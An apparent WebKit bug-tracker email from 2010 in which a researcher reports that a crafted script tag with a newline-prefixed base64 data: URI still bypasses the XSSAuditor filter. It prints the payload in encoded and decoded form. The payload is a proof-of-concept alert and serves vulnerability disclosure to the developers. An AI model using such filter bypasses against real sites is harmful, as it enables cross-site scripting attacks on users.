[Webkit-unassigned] [Bug 29278] XSSAuditor bypasses from sla.ckers.org
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Fri Aug 6 10:03:54 PDT 2010
https://bugs.webkit.org/show_bug.cgi?id=29278
--- Comment #8 from Mario Heiderich <mario.heiderich at gmail.com> 2010-08-06 10:03:54 PST ---
I just tested again - it bypasses the filter with a regular closing script tag too
%22%3E%3Cscript%20src=%0adata:%01;base64,YWxlcnQoMSkNCg==%20%3E%3C/script%3E
"><script src=
data:�;base64,YWxlcnQoMSkNCg== ></script>
The script execution is being blocked as soon as the %0A before data: is being left away. Maybe that helps to locate the filter bug.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list